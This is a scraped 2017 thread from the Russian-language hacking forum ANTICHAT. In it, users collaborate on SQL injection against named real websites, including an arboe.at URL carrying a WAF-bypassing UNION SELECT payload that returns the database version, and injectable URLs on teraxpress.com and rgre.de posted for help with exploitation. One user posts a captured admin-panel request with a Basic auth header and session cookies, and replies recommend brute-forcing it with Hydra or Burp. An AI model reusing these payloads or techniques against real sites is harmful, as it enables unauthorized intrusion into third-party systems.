ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.08.2017, 23:23
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
|
|
|
29.08.2017, 23:58
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Код:
Code:
http://www.arboe.at/index.php?id=9528&origin=search&no_cache=1&catId=-176+UniOn%0B/*hjh%0B%0Bijhi%0Bokihuygtfryujiko%0Biuytreftgyhujik%0Bijuhygtfrderftgyhujik%0Bokijuhygtfrftgyhuji%0Biuytrftgyh%0B*/Select+%20version/*asd*/()+--+
@ BabaDook обошел Waf, но как я понял были проблемы с выводом версии и тд, не знаю почему не отписал сюда. Версию вывели, дальше сам!
Ergebnisse der Volltextsuche zu " 5.5.27"
|
|
|
|
30.08.2017, 14:44
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Сообщение от cat1vo
cat1vo said:
↑
Код:
Code:
http://www.arboe.at/index.php?id=9528&origin=search&no_cache=1&catId=-176+UniOn%0B/*hjh%0B%0Bijhi%0Bokihuygtfryujiko%0Biuytreftgyhujik%0Bijuhygtfrderftgyhujik%0Bokijuhygtfrftgyhuji%0Biuytrftgyh%0B*/Select+%20version/*asd*/()+--+
@
BabaDook
обошел Waf, но как я понял были проблемы с выводом версии и тд, не знаю почему не отписал сюда. Версию вывели, дальше сам!
Ergebnisse der Volltextsuche zu "
5.5.27
" from фильтрует, пытался скрыть кодировкой,пробелами,комен тами, регистром, ни чё не помогает( может у кого то получится...
|
|
|
|
31.08.2017, 21:35
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Ребят кто сможет подсказать с этими двумя урлами
Ошибка есть
Но что только не пробовал глухо((
Код:
Code:
http://www[.]teraxpress[.]com/index.php?route=extension/module/merchant_profile&merchant_id=65
http://www[.]teraxpress[.]com/index.php?route=extension/module/merchantlogo/getStoreCategory&vpath=3&sort=pd.name&order=ASC&merchant_id=3&limit=25
|
|
|
|
02.09.2017, 22:54
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 47
Провел на форуме:
261218
Репутация:
10
|
|
всем доброго времени.
на админке стоит http basic authentication
читал что можно перехватить login : password в формате base64
.SpoilerTarget" type="button">Spoiler
Код:
Code:
GET /administrator/ HTTP/1.1
Connection: keep-alive
Cache-Control: max-age=0
Authorization: Basic NDUzdDo1NHQ=
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: ru,en-US;q=0.8,en;q=0.6
X-Compress: null
Cookie: ring=840b4f0c8e5d64ca6d2fe74dead87a4c; _ym_uid=1504109674995456289; city=25; region=104; visitor=e88e905cdaad3d67f0c6df4765c34a76c1e7d4eec4a3cc8e44345b11c108c473; _ga=GA1.3.2065729496.1504109674; PHPSESSID=4o4ui8jeikerke04dmltqtdcp0; pastafarian=c4e5bfebfbbf5abeb2936bb31ec6140386388055110b8debd270cbf7c755644d; winter=11457.59a6e778e6cd71.61786604; _ym_isad=1; _ga=GA1.2.2065729496.1504109674; _gid=GA1.2.994183403.1504355776
Authorization: Basic NDUzdDo1NHQ= |
|
|
|
03.09.2017, 14:50
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Код:
Code:
http://www.rgre.de/rgre-partnerschaften/index.php?dt_orgname=&dt_plz=&dt_einwohnerzahl_min=&dt_einwohnerzahl_max=&dt_bundesland=&aus_orgname=&aus_plz=&aus_kontinent=&partner_seit_von=&partner_seit_bis=&partner_form=&submit=Suche&aus_land=GR&order_by=land'
чёт туплю, не могу вывод сделать( |
|
|
|
04.09.2017, 00:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
187765
Репутация:
154
|
|
[QUOTE="Lesanglier"]
Lesanglier said:
↑
всем доброго времени.
на админке стоит http basic authentication
читал что можно перехватить login : password в формате base64
Spoiler
Код:
Code:
GET /administrator/ HTTP/1.1
Connection: keep-alive
Cache-Control: max-age=0
Authorization: Basic NDUzdDo1NHQ=
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: ru,en-US;q=0.8,en;q=0.6
X-Compress: null
Cookie: ring=840b4f0c8e5d64ca6d2fe74dead87a4c; _ym_uid=1504109674995456289; city=25; region=104; visitor=e88e905cdaad3d67f0c6df4765c34a76c1e7d4eec4a3cc8e44345b11c108c473; _ga=GA1.3.2065729496.1504109674; PHPSESSID=4o4ui8jeikerke04dmltqtdcp0; pastafarian=c4e5bfebfbbf5abeb2936bb31ec6140386388055110b8debd270cbf7c755644d; winter=11457.59a6e778e6cd71.61786604; _ym_isad=1; _ga=GA1.2.2065729496.1504109674; _gid=GA1.2.994183403.1504355776
Authorization: Basic NDUzdDo1NHQ= |
|
|
|
04.09.2017, 18:40
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 47
Провел на форуме:
261218
Репутация:
10
|
|
Сообщение от SooLFaa
SooLFaa said:
↑
Абсолютно верно. Логин и пароль указаны в кодировке base64. По поводу перехватить - если ты не в одной сети с жервтой будет сложно. Зато брутится очень легко. burp справится хорошо или лучше другим софтом?
|
|
|
|
04.09.2017, 18:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
187765
Репутация:
154
|
|
Сообщение от Lesanglier
Lesanglier said:
↑
burp справится хорошо или лучше другим софтом? Я гидрой бручу basic. Но у меня то сервер. А так на вкус и цвет.
|
|
|
|
08.09.2017, 14:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от DezMond™
DezMond™ said:
↑
Код:
Code:
http://www.rgre.de/rgre-partnerschaften/index.php?dt_orgname=&dt_plz=&dt_einwohnerzahl_min=&dt_einwohnerzahl_max=&dt_bundesland=&aus_orgname=&aus_plz=&aus_kontinent=&partner_seit_von=&partner_seit_bis=&partner_form=&submit=Suche&aus_land=GR&order_by=land'
чёт туплю, не могу вывод сделать( Я не виду там инъекции. Может я тоже туплю. Кидай ещё сайты
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
